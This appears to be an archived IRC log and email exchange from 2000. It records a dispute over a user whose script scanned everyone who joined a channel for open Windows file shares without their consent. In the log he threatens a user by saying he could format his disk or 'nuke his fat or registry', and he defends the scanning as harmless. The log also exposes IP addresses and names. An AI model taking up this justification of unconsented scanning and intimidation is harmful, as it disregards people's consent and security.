<patience_> anywho <patience_> i'm starvinh hungy *** Latte ([email protected] ne.no) has left #Christian <patience_> need some food question too difficult to answer or something? eat well patience

<patience_> i just dont feel like answering em either * pSyk_ shrugs. <patience_> but its almost 10pm and i havent had supper Raid you're about to get your lil tail in alot of trouble from what I'm seeing patience_ it's ok. there is no way you can answer that question and have faith in god at the same time. I suggest you stop threatening people with attacks before I remove you from Undernet patience_: A science lesson for you. The fuel our cars run on is from rotted dino bones. Which took millions (not thousands) of years to produce. CiCi: for? CiCi: Ehh, Who have I threatened ? -> *CiCi* enlighten me, Whom have I threatend since I've been here? *** patience_ is now known as pataway *** dreamweb has quit IRC (Ping timeout for dreamweb[213.108.36.228]) Raid you may only be a teenager, but you've no involved yourself in a problem with the authorities I'll let them handle it, but a word of advice would be to judge who you threaten more carefully CiCi: Listen, I'm not a teenager.. and I don't think the authorities are going to do anything about me. CiCi: But if you know something I don't, I;d like to know about it. Raid when you threaten to do damage to someone's computer system, and you dare them to take legal action, rest assured, they WILL do that and don't act like you have no clue what's going on here that's the end of my discussion with you, you can talk to an attorney *** CiCi ([email protected]) has left #Christian wow *** RoadRunnr ([email protected] g.co.nz) has joined #Christian uh huh ud' think god came down and shoved a red hot poker up his bummhole *** MarySue ([email protected] .nz) has joined #Christian I didn't threaten him, He had a real open share on his box. *** logos3 sets mode: +o RoadRunnr thats HIS fault, jerk

<pataway> allrighty pSyk_ *** dreamweb1 ([email protected]) has joined #Christian <pataway> i think u should leave <`Pegasus> hi Road! hi.. -> *dan_* what the fuck is with cici? *** pSyk_ was kicked by RoadRunnr (pSyk_) <pataway> hi roady *** pSyk_ ([email protected]) has joined #Christian *** RoadRunnr sets mode: +b *!*@endless .efortress.com *** pSyk_ was kicked by logos3 (Banned) *s* <`Pegasus> thanks rr! *** Karentra ([email protected]. splitrock.net) has joined #Christian <pataway> ta roady *** Karentra ([email protected]. splitrock.net) has left #Christian *** RoadRunnr sets mode: -o RoadRunnr <pataway> i would ahve done the honors myself but logos well.... yah what a way to start the day.. I don't beleive this BS... <pataway> hi MarySue !!!! * pataway willl BBL I tell somebody they have a security problem, and I'm reported to the authorities? <MarySue> patience : )) <pataway> Raid i think she referred to what you said to LC when you were here earlier -> *cici* You want my logs of christian ? I didn't threaten your friend chap. I told him he has an open share and he's vulnerable, I did nothing to his computer. eh? pataway: HE has an open acccess to his computer, Ok? <pataway> anywho <pataway> she = CiCi pataway: With that, anybody can access his hard disk. <`Pegasus> what? Raid, are you saying what i think you are saying? *** MarySue is now known as MarySafk DAN!!!!!!!!! we don't tolerate threats in here RoadRunnr: grrrr. <Melv\Mike> MarySafk RoadRunnr: damnit dude, listen to me. I warned chap he had an open share; I didn't DO ANYTHING TO HIM. dan_? <Melv\Mike> RoadRunnr: Oh yeah? what

are you going to do about it? <`Pegasus> Are you guys saying he can access my HD? okay, lets move on then :) `Pegasus: If you had an open share, anybody could. <pataway> i dunno what an open share is lol <`Pegasus> Raid: what port does that use? *** Pipetobak ([email protected] .voyager.net) has joined #Christian Yo! !rsv lev 16 13 <`Pegasus> hi Pipetobak: Lev 16:13 "13 and put the incense on the fire before the LORD, that the cloud of the incense may cover the mercy seat which is upon the testimony, lest he {die;}" (RSV) * Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with relish as he glances about looking for interesting conversation. Peg! <`Pegasus> hi pipe hiya Pipetobak Roadrunner! Raid, how have you been anyhow? [`Pegasus:#Christian PING] *** ZoOrOpA ([email protected]) has left #Christian <`Pegasus> anyone? huh? <`Pegasus> ok :) <`Pegasus> I tought I was alone you're with a nut lol and a RR but i am not staying hehe *** i8dog ([email protected] et) has joined #Christian <`Pegasus> lol RoadRunnr: Pretty good, But I'm losing my opinion of the undernet ircops intelligence. hello good people of CHRIST. <`Pegasus> uh oh no offense dan ;p <`Pegasus> i8dog? hello

is dan awake ? <`Pegasus> whats wrong? <`Pegasus> I see hmm? whats wrong? <`Pegasus> Raid: Thats not very nice to say *** MarySafk is now known as MarySue * i8dog opens the bible and starts reading. *** Kozubchik ([email protected]) has joined #Christian lets move on from that, okay <`Pegasus> wb marysue hiya MarySue, i8dog and Kozubchik hello roadrunnr. Hey Road * i8dog reads fevershly looking for answers. <MarySue> *Hugs* RoadRunnr * RoadRunnr ain't staying.. am on the expensive isp <`Pegasus> You know what guys, this place is getting too weird today. I think Im gonna come back later. just sending some mail <`Pegasus> God Bless you all bye pegasus ! <`Pegasus> bye bye RR *** `Pegasus (Nons@HSE-QuebecCity-ppp82 042.qc.sympatico.ca) has left #Christia n *** atman` ([email protected]) has joined #Christian take care peg... don't let the yellow dots make your head purple. anyone ever hear from Petrus, who used to hang out here? <MarySue> atman` !!!!!!!!!! yeah, he still pops in * RoadRunnr double blinks.. atman?! *logos3* petrus was last on IRC channel #christian 2 days, 18 hours, 11 minutes ago. * JnetyBabe wakes up hi RR raid rules. <MarySue> atman` he's here every now and then ah, ok, just was thinking about him :) Thanks! Pray unto God for Thumps and his Loved Ones, O holy God Pleaser St Michael the Archangel, for we all need to fervently flee unto thee, the speedy helper and intercessor for our souls. <JnetyBabe> later all... *** JnetyBabe ([email protected] .138.179.LosAngeles1.Level3.net) has left #Christian

<MarySue> atman` I think Colin^ talked with him a couple of days ago : ) thanks Marysue & RR :) <MarySue> <---- is abbigail, remember me, atman`??? *** atman` ([email protected]) has left #Christian <MarySue> guess he does ... lol <MarySue> ; ) lol.. wierd End of #Christian buffer Fri Sep 08 16:14:38 2000 The next Day, I begin to talk to her.. Here's that log. :) I dub this, "The undernet funny" Session Start: Fri Sep 08 23:01:35 2000 Session Ident: CiCi ([email protected]) >/whois cici CiCi is [email protected] * God Can! CiCi on #christian CiCi using dallas.tx.us.undernet.org www.airmail.net CiCi is an IRC Operator cici End of /WHOIS list. why? I don't think you quiet understand what you erm, reported me for. heh Mr chaplain had open shared drives. I didn't do anything to him, I told him it was there; I even directed him to a website for zone alarm. (firewall; fixes that problem) I told him if I was a jerk as he said, I would have formatted him. I didn't do so. hehe I didn't "hack" him or anything. His computer isn't setup properly. His entire c: drive is wide open to anybody; even you. ok, let me go read these logs again with that in mind, brb So when I'm contacted by the authorities, (they already know about this serious security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him. thanks. [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider that a threat, lamer. Are you going to use the entire log, or out of context? I have no need to threaten CiCi. I could have kept my mouth shut. then anybody (even you) could access his entire system. and use it like you were sitting at the keyboard. I thought he might like to know about it. Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no idea you didn't know about this serious problem with windows machines. NT suffers from it as well. in fact, everytime you reboot; unless you manually set it otherwise, drive c: is shared as open, with admin rights, no password. listen, if you really don't believe me, You can ask anybody you trust with computer knowledge to checkout this log of our chat. I'm not bsing you. I was trying to save you some shame is all. (My boss thought it was funny as hell.) you were trying to save me from shame? heh erm, embarrasment rather it's not normal for an admin to not understand shared drives. ;p and you are an administrator. hehe if your boss had a copy of your logs I don't think he'd think your actions were funny Admins are supposed to know these things, and if they don't check it out first.

Actually, he was standing beside me the entire convo; including the one with chaplain. if you were trying to help, that's one thing, but you were threatening and that's not right He didn't believe me when I told him YOU were an ircop of undernet. if you recall, you tried that same mess on me when you first met me I had to /whois and show him your "is an ircop" thingie. Listen, I had access to his computer, why threaten? Nothing he could do at that point. he was mine for the kill if I wanted it. Instead, I told him he had a problem. and explained (which you did take out of context) that if I was a jerk, I could easily format /u his hard disk, or even quicker, nuke his fat or registry. why were you looking anyway? oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you. I'm perfectly capable of backing up what I say. I wasn't. My script autoscans people on joins, much like undernet does for open proxies. You might want to recommend undernet do this scan hehe it's even more serious to a users data then an open proxy. uhm no undernet isn't a nanny service Shrug, as I said... if you don't know about something, Check it out before accusing me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing. the only things we look for are things that damage this network on a large scale the admins would NEVER agree to such scans as yours done to all guests if they all knew about the bug in windows, I bet you they would. now, I"m tired of you insulting me I'm sure some of you ircops login with windows boxes. I'm not trying to insult you. Actually I find you one of the cooler ircops i've talked too. I realize I may sound like a smartass; But it's seriously not intentional. I simply want to resolve this issue with you. I'm not worried about the authorities. I just don't like people thinking I've done something i didn't is all. you scanned someone's machine and then said [13:29] (Raid): LC: So consider that a threat, lamer. My script scanned him when he joined. I haven't changed my opinion of your immature behavior hmmm if you honestly wanted to help people by doing this, you wouldn't call them lamers Did you get the entire log, or just what I said to him? do you have any clue what percentage of our undernet guests I could call lamers? IE: the first thing he said to me? alot of them, but I don't I was minding my own business, he smarted off. I decided to tell him in open channel (I was writing /msg to him) that he had a problem. perhaps a lack of communication skills is the problem, I don't now, but I do know that what you did was not good If I was immature as you seem to think, I'd have chewed his hard disk up right before his eyes, and said nothing. *shrug* ahhh so he "smarted off" so you thought you'd put him in his place? that's typically something a kid does a kid? No mam, A kid would have formatted him the second they were told an open share was found. or stolen data or something. I told him about it, and since he was being a wiseass; I told everybody in the process. pftt that was very nice of you...... not and that's my point would it have been nicer not to tell him? so somebody WITH the intention of harm could take advantage? would have been more civil if you hadn't tried to act l33t with him

I didn't try to act l33t. and because you decided to show off and make a fool of someone, you made a mess I made no such mess, A misunderstanding of what exactly I did made a mess. Chaplain I bet didn't mention we go way back did he? I didn't show off, I already had the blasted privmsg typed... He decided to be a wise one... So I cancelled it, and wrote a new one. alot of people can hack, most of us don't, and most of us are mature enough not to have a temper fit and announce a problem enough Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is check ANY search engine (or even micrsoft) for the fix for this problem. they'll even tell you it's not a hack. it's a bug. most invasions are bugs erm, I didn't invade him. Script checked for open shares, didn't establish connection or map anything. it's no more intrusive then proxy scans. Users don't even notice it, and it doesn't show up as an attack on any firewalls either; because it isnt. *sigh* I'm finished with this now, you're wrong to threaten people, end of story ugh... Well, checkout what I said if you get a chance. and goodnight n stuff.

From John Grahms Sat Sep 9 10:07:29 2000 Received: from [205.245.107.244] by web1610.mail.yahoo.com; Sat, 09 Sep 2000 10:07:29 PDT Date: Sat, 9 Sep 2000 10:07:29 -0700 (PDT) From: John Grahms | Block address Subject: Hello To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 9146 Add Addresses

Hi there. I thought you might like to know you have one stupid ircop on undernet. Not only is she stupid, but it's impossible to explain anything to her. Her name is CiCi, and I just got klined for "hacking". Full log follows. If you could deal with this for me, I'd appreciate it. Banned *@kpt-c-205-245-107-244.chartertn.net[1] until Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is not a playground for you to port scan and invade other's machines . Heres my kline (I went out to get some food, she klined me when I left) Heres the log of all channel activity up to my kline.

[12:25] *** Now talking in #CHristian [12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info. [12:25] mornin [12:26] *** LC ([email protected]) has joined #CHristian [12:26] *** Txico ([email protected]) Quit (Ping timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za]) [12:26] ok everyone, when Raid's in the channel, all your machines are going to be scanned so be prepared [12:27] * CiCi waits for Raid to meet her router that doesn't appreciate script kiddie probes [12:27] CiCi: Actually, I've turned the script off. [12:28] CiCi: I didn't want to risk having to explain what netbios open shares are again. ;p And heres the wonderful log last night of us chatting. This is a long read, but it seriously shows little intelligence on her part. Where did you get this lady?

Session Start: Fri Sep 08 23:01:35 2000 Session Ident: CiCi ([email protected]) >/whois cici CiCi is [email protected] * God Can! CiCi on #christian CiCi using dallas.tx.us.undernet.org www.airmail.net CiCi is an IRC Operator cici End of /WHOIS list. why? I don't think you quiet understand what you erm, reported me for. heh Mr chaplain had open shared drives. I didn't do anything to him, I told him it was there; I even directed him to a website for zone alarm. (firewall; fixes that problem) I told him if I was a jerk as he said, I would have formatted him. I didn't do so. hehe I didn't "hack" him or anything. His computer isn't setup properly. His entire c: drive is wide open to anybody; even you. ok, let me go read these logs again with that in mind, brb So when I'm contacted by the authorities, (they already know about this serious security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him. thanks. [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider that a threat, lamer. Are you going to use the entire log, or out of context? I have no need to threaten CiCi. I could have

kept my mouth shut. then anybody (even you) could access his entire system. and use it like you were sitting at the keyboard. I thought he might like to know about it. Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no idea you didn't know about this serious problem with windows machines. NT suffers from it as well. in fact, everytime you reboot; unless you manually set it otherwise, drive c: is shared as open, with admin rights, no password. listen, if you really don't believe me, You can ask anybody you trust with computer knowledge to checkout this log of our chat. I'm not bsing you. I was trying to save you some shame is all. (My boss thought it was funny as hell.) you were trying to save me from shame? heh erm, embarrasment rather it's not normal for an admin to not understand shared drives. ;p and you are an administrator. hehe if your boss had a copy of your logs I don't think he'd think your actions were funny Admins are supposed to know these things, and if they don't check it out first. Actually, he was standing beside me the entire convo; including the one with chaplain. if you were trying to help, that's one thing, but you were threatening and that's not right He didn't believe me when I told him YOU were an ircop of undernet. if you recall, you tried that same mess on me when you first met me I had to /whois and show him your "is an ircop" thingie. Listen, I had access to his computer, why threaten? Nothing he could do at that point. he was mine for the kill if I wanted it. Instead, I told him he had a problem. and explained (which you did take out of context) that if I was a jerk, I could easily format /u his hard disk, or even quicker, nuke his fat or registry. why were you looking anyway? oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you. I'm perfectly capable of backing up what I say. I wasn't. My script autoscans people on joins, much like undernet does for open proxies. You might want to recommend undernet do this scan hehe it's even more serious to a users data then an open proxy. uhm no undernet isn't a nanny service Shrug, as I said... if you don't know about something, Check it out before accusing me of doing something bad. I've been clean for almost 8 months.

Haven't hacked a single thing. the only things we look for are things that damage this network on a large scale the admins would NEVER agree to such scans as yours done to all guests if they all knew about the bug in windows, I bet you they would. now, I"m tired of you insulting me I'm sure some of you ircops login with windows boxes. I'm not trying to insult you. Actually I find you one of the cooler ircops i've talked too. I realize I may sound like a smartass; But it's seriously not intentional. I simply want to resolve this issue with you. I'm not worried about the authorities. I just don't like people thinking I've done something i didn't is all. you scanned someone's machine and then said [13:29] (Raid): LC: So consider that a threat, lamer. My script scanned him when he joined. I haven't changed my opinion of your immature behavior hmmm if you honestly wanted to help people by doing this, you wouldn't call them lamers Did you get the entire log, or just what I said to him? do you have any clue what percentage of our undernet guests I could call lamers? IE: the first thing he said to me? alot of them, but I don't I was minding my own business, he smarted off. I decided to tell him in open channel (I was writing /msg to him) that he had a problem. perhaps a lack of communication skills is the problem, I don't now, but I do know that what you did was not good If I was immature as you seem to think, I'd have chewed his hard disk up right before his eyes, and said nothing. *shrug* ahhh so he "smarted off" so you thought you'd put him in his place? that's typically something a kid does a kid? No mam, A kid would have formatted him the second they were told an open share was found. or stolen data or something. I told him about it, and since he was being a wiseass; I told everybody in the process. pftt that was very nice of you...... not and that's my point would it have been nicer not to tell him? so somebody WITH the intention of harm could take advantage? would have been more civil if you hadn't tried to act l33t with him I didn't try to act l33t. and because you decided to show off and make a

fool of someone, you made a mess I made no such mess, A misunderstanding of what exactly I did made a mess. Chaplain I bet didn't mention we go way back did he? I didn't show off, I already had the blasted privmsg typed... He decided to be a wise one... So I cancelled it, and wrote a new one. alot of people can hack, most of us don't, and most of us are mature enough not to have a temper fit and announce a problem enough Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is check ANY search engine (or even micrsoft) for the fix for this problem. they'll even tell you it's not a hack. it's a bug. most invasions are bugs erm, I didn't invade him. Script checked for open shares, didn't establish connection or map anything. it's no more intrusive then proxy scans. Users don't even notice it, and it doesn't show up as an attack on any firewalls either; because it isnt. *sigh* I'm finished with this now, you're wrong to threaten people, end of story ugh... Well, checkout what I said if you get a chance. and goodnight n stuff. Please deal with her, I don't like being klined for Bullshit. Thank YOu kindly. From L. Maurer Sat Sep 9 10:51:29 2000 X-Apparently-To: [email protected] via web1609.mail.yahoo.com Received: from mail.airmail.net (206.66.12.40) by mta223.mail.yahoo.com with SMTP; 09 Sep 2000 12:54:17 -0700 (PDT) Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for sender: id <mT/[email protected]>; Sat, 9 Sep 2000 12:49:17 -0500 (CDT) Message-Id: <[email protected]> X-Sender: [email protected] X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 09 Sep 2000 12:51:29 -0500 To: John Grahms From: "L. Maurer" | Block address Subject: Re: [Abuse] Hello CC: [email protected] Mime-Version:

1.0 Content-Type: text/plain; charset="us-ascii" Content-Length: 10041 Add Addresses

You were removed because you were actively scanning others machines as they joined the channel, invading those machines when possible, and pasting their private chat logs back to them. You have been asked to stop doing this for over 24 hours and the requests were met with an attitude from you that you were very much entitled to invade and compromise machines when someone irritated you on Undernet. Don't think for one minute that this is either legal or appreciated using Undernet bandwidth. If this is repeated by you when your gline expires, expect another one. Ci_Ci Admin.

Dallas.TX.US.Undernet.Org

At 10:07 AM 9/9/00 -0700, you wrote: >Hi there. I thought you might like to know you have >one stupid ircop on undernet. Not only is she stupid, >but it's impossible to explain anything to her. > >Her name is CiCi, and I just got klined for "hacking". >Full log follows. If you could deal with this for me, >I'd appreciate it. > >Banned *@kpt-c-205-245-107-244.chartertn.net[1] until >Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is >not a playground for you to port scan and invade >other's machines . > >Heres my kline (I went out to get some food, she >klined me when I left) Heres the log of all channel >activity up to my kline. >[12:25] *** Now talking in #CHristian >[12:25] -logos3- http://www.forchrist.net - channel >website, for rules and other info. >[12:25] mornin >[12:26] *** LC >([email protected]) has >joined #CHristian >[12:26] *** Txico >([email protected]) Quit (Ping >timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za]) >[12:26] ok everyone, when Raid's in the >channel, all your machines are going to be scanned so >be prepared >[12:27] * CiCi waits for Raid to meet her router that >doesn't appreciate script kiddie probes >[12:27] CiCi: Actually, I've turned the script

>off. >[12:28] CiCi: I didn't want to risk having to >explain what netbios open shares are again. ;p > >And heres the wonderful log last night of us chatting. >This is a long read, but it seriously shows little >intelligence on her part. Where did you get this lady? > > >Session Start: Fri Sep 08 23:01:35 2000 >Session Ident: CiCi ([email protected]) >>/whois cici >CiCi is [email protected] * God Can! >CiCi on #christian >CiCi using dallas.tx.us.undernet.org www.airmail.net >CiCi is an IRC Operator >cici End of /WHOIS list. > > why? > I don't think you quiet understand what you >erm, reported me for. heh > Mr chaplain had open shared drives. I didn't do >anything to him, I told him it was there; I even >directed him to a website for zone alarm. (firewall; >fixes that problem) > I told him if I was a jerk as he said, I would >have formatted him. > I didn't do so. hehe > I didn't "hack" him or anything. > His computer isn't setup properly. > His entire c: drive is wide open to anybody; >even you. > ok, let me go read these logs again with that >in mind, brb > So when I'm contacted by the authorities, (they >already know about this serious security problem.. ) >they'll probably get a chuckle out of it. As I told >chaplain he had this problem, if I was a jerk; I >wouldn't have said a word.. just done mean things to >him. > thanks. > [13:29] (Raid): LC: So consider that a threat, >lamer.[13:29] (Raid): LC: So consider that a threat, >lamer. > Are you going to use the entire log, or out of >context? > I have no need to threaten CiCi. I could have >kept my mouth shut. > then anybody (even you) could access his entire >system. > and use it like you were sitting at the >keyboard. > I thought he might like to know about it. > Next time I find somebody has this problem... >shrug, I'll just keep quiet. I had no idea you didn't >know about this serious problem with windows machines. > NT suffers from it as well. > in fact, everytime you reboot; unless you >manually set it otherwise, drive c: is shared as open, >with admin rights, no password. > listen, if you really don't believe me, You can >ask anybody you trust with computer knowledge to >checkout this log of our chat.

> I'm not bsing you. > I was trying to save you some shame is all. > (My boss thought it was funny as hell.) > you were trying to save me from shame? > heh > erm, embarrasment rather > it's not normal for an admin to not understand >shared drives. ;p > and you are an administrator. hehe > if your boss had a copy of your logs I don't >think he'd think your actions were funny > Admins are supposed to know these things, and >if they don't check it out first. > Actually, he was standing beside me the entire >convo; including the one with chaplain. > if you were trying to help, that's one thing, >but you were threatening and that's not right > He didn't believe me when I told him YOU were >an ircop of undernet. > if you recall, you tried that same mess on me >when you first met me > I had to /whois and show him your "is an ircop" >thingie. > Listen, I had access to his computer, why >threaten? Nothing he could do at that point. he was >mine for the kill if I wanted it. > Instead, I told him he had a problem. > and explained (which you did take out of >context) that if I was a jerk, I could easily format >/u his hard disk, or even quicker, nuke his fat or >registry. > why were you looking anyway? > oh and btw, I'm not a teenager; or a script >kiddy, I don't have any reason to bs you. I'm >perfectly capable of backing up what I say. > I wasn't. > My script autoscans people on joins, much like >undernet does for open proxies. > You might want to recommend undernet do this >scan hehe > it's even more serious to a users data then an >open proxy. > uhm no > undernet isn't a nanny service > Shrug, as I said... if you don't know about >something, Check it out before accusing me of doing >something bad. I've been clean for almost 8 months. >Haven't hacked a single thing. > the only things we look for are things that >damage this network on a large scale > the admins would NEVER agree to such scans as >yours done to all guests > if they all knew about the bug in windows, I >bet you they would. > now, I"m tired of you insulting me > I'm sure some of you ircops login with windows >boxes. > I'm not trying to insult you. > Actually I find you one of the cooler ircops >i've talked too. > I realize I may sound like a smartass; But it's >seriously not intentional. > I simply want to resolve this issue with you.

> I'm not worried about the authorities. > I just don't like people thinking I've done >something i didn't is all. > you scanned someone's machine and then said > [13:29] (Raid): LC: So consider that a threat, >lamer. > My script scanned him when he joined. > I haven't changed my opinion of your immature >behavior > hmmm > if you honestly wanted to help people by doing >this, you wouldn't call them lamers > Did you get the entire log, or just what I said >to him? > do you have any clue what percentage of our >undernet guests I could call lamers? > IE: the first thing he said to me? > alot of them, but I don't > I was minding my own business, he smarted off. >I decided to tell him in open channel (I was writing >/msg to him) that he had a problem. > perhaps a lack of communication skills is the >problem, I don't now, but I do know that what you did >was not good > If I was immature as you seem to think, I'd >have chewed his hard disk up right before his eyes, >and said nothing. > *shrug* > ahhh so he "smarted off" so you thought you'd >put him in his place? that's typically something a >kid does > a kid? > No mam, A kid would have formatted him the >second they were told an open share was found. > or stolen data or something. > I told him about it, and since he was being a >wiseass; I told everybody in the process. > pftt > that was very nice of you...... not > and that's my point > would it have been nicer not to tell him? > so somebody WITH the intention of harm could >take advantage? > would have been more civil if you hadn't tried >to act l33t with him > I didn't try to act l33t. > and because you decided to show off and make a >fool of someone, you made a mess > I made no such mess, A misunderstanding of what >exactly I did made a mess. > Chaplain I bet didn't mention we go way back >did he? > I didn't show off, I already had the blasted >privmsg typed... He decided to be a wise one... So I >cancelled it, and wrote a new one. > alot of people can hack, most of us don't, and >most of us are mature enough not to have a temper fit >and announce a problem > enough > Alright, fine. You don't believe me.. That's >perfectly ok. All you need to do is check ANY search >engine (or even micrsoft) for the fix for this >problem.

> they'll even tell you it's not a hack. > it's a bug. > most invasions are bugs > erm, I didn't invade him. Script checked for >open shares, didn't establish connection or map >anything. > it's no more intrusive then proxy scans. Users >don't even notice it, and it doesn't show up as an >attack on any firewalls either; because it isnt. > *sigh* I'm finished with this now, you're wrong >to threaten people, end of story > ugh... Well, checkout what I said if you get a >chance. > and goodnight n stuff. > >Please deal with her, I don't like being klined for >Bullshit. Thank YOu kindly. > > > >__________________________________________________ >Do You Yahoo!? >Yahoo! Mail - Free email you can access from anywhere! >http://mail.yahoo.com/ > From John Grahms Sat Sep 9 16:06:45 2000 Received: from [205.245.105.248] by web1610.mail.yahoo.com; Sat, 09 Sep 2000 16:06:45 PDT Date: Sat, 9 Sep 2000 16:06:45 -0700 (PDT) From: John Grahms | Block address Subject: Re: [Abuse] Hello To: Gator MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 1641 Add Addresses

--- Gator wrote: > File shares were not a big problem in the past when > users were mostly on > modems. Windows would warn you if you enabled file > sharing on your modem. > However, today in the world of cable and dsl, these > devices usually use > network cards, the same is not true. Windows not > only does not warn you if > you enable file shares on your network card > device(s), but with the default > bindings and filesharing installed you are > vulnerable. Your drives are open > to the public and there are quiet a few virii and

> > > > > >

trojans that actually exploit this to spread. So in short the man is right about it being a problem. I have no idea what he did with that information however.

I told the user he had a problem, and suggested he get Zone alarm firewall; I've got those logs too if you should need them. I did NOT at any time access his machine, nor map any drives to mine. I was informed he was vulnerable; I told him. I tried to explain this to CiCi, but she clearly couldn't understand such a simple concept of telling somebody they have a real serious problem. I did NOT attack mr chaplains computer at any time, and she didn't gline me last night. She glined me today; She had plenty of time to gline last night. Regardless, her gline wasn't valid. I did not use the information that my script told me about for anything bad, And I'd appreciate it if yuo could explain this to her, so I don't have to deal with this BS. From John Grahms Sat Sep 9 17:18:10 2000 Received: from [205.245.105.248] by web1604.mail.yahoo.com; Sat, 09 Sep 2000 17:18:10 PDT Date: Sat, 9 Sep 2000 17:18:10 -0700 (PDT) From: John Grahms | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" CC: [email protected] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-160051528-968545090=:19289" Content-Length: 111621 Add Addresses

--- "L. Maurer" wrote: > You were removed because you were actively scanning > others machines as they joined the channel, invading > those machines when possible, and pasting > their private chat logs back to them. Incorrect. and I have logs not only from me to prove this, but from others present during the convo. Your defiantly in the wrong. I did not invade ANY machines, and i'd love to see your proof stating otherwise. I'm sure my boss would as well. Being as he was present

during the initial conversation with Chaplain. Even he knew about the shared drives problem on windows machines. He did not believe me when I told him you were an Oper on undernet; I actually had to /whois you to show him it! My script didn't do anything harmful to anyones machine. And I didn't do anything harmful with the information it told me either, I informed users they had a problem if it found one, and I suggested they obtain Zone Alarm firewall.

> You have been asked to stop doing > this for over 24 hours and the requests were met Oh really? That's not exactly true, now is it. The second I logged in today (as the log of today shows, I 've attached it to this message) you made a public comment about me scanning people (not exactly true, nor correct) I responded and plainly told you I had turned the script off, because I was tired of explaining shared drives to people. Actually, your the first who didn't know about the problem. Since My little run in(which I sent to abuse@undernet) with yuo last night. I then set away.. I was gone maybe 16 minutes.. I went to get some food at Burger king... When I came back, YOU GLINED me. I flat out told you the script was no longer active; YOU THEN GLINED ME AFTER I left. Nah, I didn't do anything against undernet policy CiCi, and you damn well know it. > with an attitude from you that you were very much entitled to invade and compromise machines when

>

Not true. You said in channel that I was hacking (I have that log too) chaplain. You also informed me I had been reported to the authorities; and should be expecting a call from his lawyer soon. I'm still waiting for that call btw.

> Don't think for one minute that this is either legal > or appreciated using Undernet bandwidth. Real network aware one you are... I wasn't using undernet bandwidth running my script...And what my script was doing is damn sure not illegal. Unless your going to tell me undernets proxy scans of me everytime I connect is also illegal? I didn't do anything different. I didn't map any of his drives to my system. (I only knew that he had that available). I was nice enough to tell him he had a problem. > If this is repeated by you when your > expect another one.

gline expires,

LOL! Fine. Expect an email with logs to [email protected] everytime you do so. I'm not one usually for getting glines. Nice try, CiCi. It's obvious you have a personal problem with me, That's fine. Still not a reason for you to abuse your own networks policy and gline me for it Glining me from your server would be different, but... Personal

problems can easily be resolved via ignore. Not to mention the fellow you glined last night for swearing in a channel you don't even op in. I've got that log too ;p I've also heard from others (and I'm sure they have logs) that you've been abusing your Oline for some time now. glining people for channel matters; Of which you have no status in. Just because you "hangout" in a channel doesn't give you the right to gline people from the entire undernet; Thats what the channel has ops for. I carbon copied this email to Gator, I simply don't trust you enough to send him copies of this entire email. You quoted me out of context once already. The log file is kinda large; scroll down for the relevant info.

__________________________________________________ Do You Yahoo!? Yahoo! Mail - Free email you can access from anywhere! http://mail.yahoo.com/

> Gator From L. Maurer Sun Sep 10 13:03:41 2000 X-Apparently-To: [email protected] via web1602.mail.yahoo.com Received: from mail.airmail.net (206.66.12.40) by mta116.mail.yahoo.com with SMTP; 10 Sep 2000 13:18:21 -0700 (PDT) Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for sender: id <mT/[email protected]>; Sun, 10 Sep 2000 15:01:52 -0500 (CDT) Message-Id: <[email protected]> X-Sender: [email protected] X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sun, 10 Sep 2000 15:03:41 -0500 To: John Grahms From: "L. Maurer" | Block address Subject: Re: [Abuse] Hello CC: [email protected] Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Length:

5115 Add Addresses

At 05:18 PM 9/9/00 -0700, John Grahms wrote: >Incorrect. and I have logs not only from me to prove >this, but from others present during the convo. Your >defiantly in the wrong. I did not invade ANY machines, >and i'd love to see your proof stating otherwise. Then explain how you were pasting back private chat logs that Chaplain had with others :/ When I first chatted with you about this, you told me you wouldn't have done anything to him but because he was a smart alec, or something of that nature, you thought you were within your right to do this. Just because you CAN hit a child doesn't mean it's the proper thing to do and most of our undernet guests are virtual children. We don't take advantage of that fact. > >Not true. You said in channel that I was hacking (I >have that log too) chaplain. I'm not Chaplain. Get your people straight. There is more than one person here who has been effected by your actions and AFAIK Chaplain isn't reading this email.

>You also informed me I >had been reported to the authorities; and should be >expecting a call from his lawyer soon. I'm still >waiting for that call btw. I told you nothing of the sort. Once again, get your people straight. It is my understanding that Chaplain has contacted his church's attorney and that since you both live in the same state, there is merit for suit. That's all I know about that and that's all I want to know about it.

> >Real network aware one you are... I wasn't using >undernet bandwidth running my script...And what my >script was doing is damn sure not illegal. Unless your >going to tell me undernets proxy scans of me everytime >I connect is also illegal? I didn't do anything >different. OK, if you weren't using undernet bandwidth, explain how you knew the IP/host information of the people you were scanning. You were scanning everyone that entered a channel on Undernet without their consent. The "consent" part is the difference between your scans and the proxy scans

